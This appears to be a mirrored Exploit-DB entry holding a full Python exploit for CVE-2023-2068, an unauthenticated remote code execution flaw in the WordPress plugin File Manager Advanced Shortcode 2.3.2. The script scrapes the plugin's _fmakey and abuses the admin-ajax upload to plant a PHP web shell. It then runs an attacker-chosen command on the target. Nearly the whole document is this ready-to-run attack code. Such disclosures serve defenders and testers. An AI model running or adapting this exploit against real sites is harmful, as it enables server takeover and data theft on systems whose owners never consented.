File Manager Advanced Shortcode 2.3.2 - Unauthenticated Remote Code Execution (RCE)

EDB-ID:

51505

2023-2068

EDB Verified:

Platform:

PHP

Date:

2023-06-04

Vulnerable App:

# Exploit Title: File Manager Advanced Shortcode 2.3.2 - Unauthenticated Remote Code Execution (RCE)
# Date: 05/31/2023
# Exploit Author: Mateus Machado Tesser
# Vendor Homepage: https://advancedfilemanager.com/
# Version: File Manager Advanced Shortcode 2.3.2
# Tested on: Wordpress 6.1 / Linux (Ubuntu) 5.15
# CVE: CVE-2023-2068

import requests
import json
import pprint
import sys
import re

PROCESS = "\033[1;34;40m[*]\033[0m"
SUCCESS = "\033[1;32;40m[+]\033[0m"
FAIL = "\033[1;31;40m[-]\033[0m"

try:
	COMMAND = sys.argv[2]
	IP = sys.argv[1]
	if len(COMMAND) > 1:
		pass
	if IP:
		pass
	else:
		print(f'Use: {sys.argv[0]} IP COMMAND')
except:
	pass

url = 'http://'+IP+'/' # Path to File Manager Advanced Shortcode Panel
print(f"{PROCESS} Searching fmakey")

try:
	r = requests.get(url)
	raw_fmakey = r.text
	fmakey = re.findall('_fmakey.*$',raw_fmakey,re.MULTILINE)[0].split("'")[1]
	if len(fmakey) == 0:
		print(f"{FAIL} Cannot found fmakey!")
except:
	print(f"{FAIL} Cannot found fmakey!")

print(f'{PROCESS} Exploiting Unauthenticated Remote Code Execution via AJAX!')
url = "http://"+IP+"/wp-admin/admin-ajax.php"
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryI52DGCOt37rixRS1", "Accept": "*/*"}
data = "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"reqid\"\r\n\r\n\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"hashes[l1_cG5nLWNsaXBhcnQtaGFja2VyLWhhY2tlci5wbmc]\"\r\n\r\nexploit.php\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nfma_load_shortcode_fma_ui\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"_fmakey\"\r\n\r\n"+fmakey+"\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"path\"\r\n\r\n\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"url\"\r\n\r\n\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"w\"\r\n\r\nfalse\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"r\"\r\n\r\ntrue\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"hide\"\r\n\r\nplugins\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"operations\"\r\n\r\nupload,download\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"path_type\"\r\n\r\ninside\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"hide_path\"\r\n\r\nno\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"enable_trash\"\r\n\r\nno\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"upload_allow\"\r\n\r\ntext/x-php\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"upload_max_size\"\r\n\r\n2G\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"exploit2.php\"\r\nContent-Type: text/x-php\r\n\r\n<?php system($_GET['cmd']);?>\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"mtime[]\"\r\n\r\n\r\n------WebKitFormBoundaryI52DGCOt37rixRS1--\r\n"
r = requests.post(url, headers=headers, data=data)
print(f"{PROCESS} Sending AJAX request to: {url}")
if 'errUploadMime' in r.text:
	print(f'{FAIL} Exploit failed!')
	sys.exit()
elif r.headers['Content-Type'].startswith("text/html"):
	print(f'{FAIL} Exploit failed! Try to change _fmakey')
	sys.exit(0)
else:
	print(f'{SUCCESS} Exploit executed with success!')
exploited = json.loads(r.text)
url = ""
print(f'{PROCESS} Getting URL with webshell')
for i in exploited["added"]:
	url = i['url']
print(f"{PROCESS} Executing '{COMMAND}'")
r = requests.get(url+'?cmd='+COMMAND)
print(f'{SUCCESS} The application returned ({len(r.text)} length):\n'+r.text)

Copy

[webapps] File Manager Advanced Shortcode 2.3.2 - Unauthenticated Remote Code Ex...

File Manager Advanced Shortcode 2.3.2 - Unauthenticated Remote Code Execution (RCE)

EDB-ID:

51505

2023-2068

Platform:

PHP

Date:

2023-06-04

Recommend

怎么让chatGPT回答我的问题？

如何通过面试可以看出一个人的责任心？

拆解14部经典电影的配色方案，养眼又高级

怎么定义刚需？ - PMCAFF产品经理社区

如何将 Zed 编辑器设置为你的命令行默认编辑器

Automate the posting of Payments received from Emails into SAP

Work From Home is Helping Working Moms

约翰·梅纳德·凯恩斯

barra 数据文件格式解析

17 Stories To Learn About Scala

About Joyk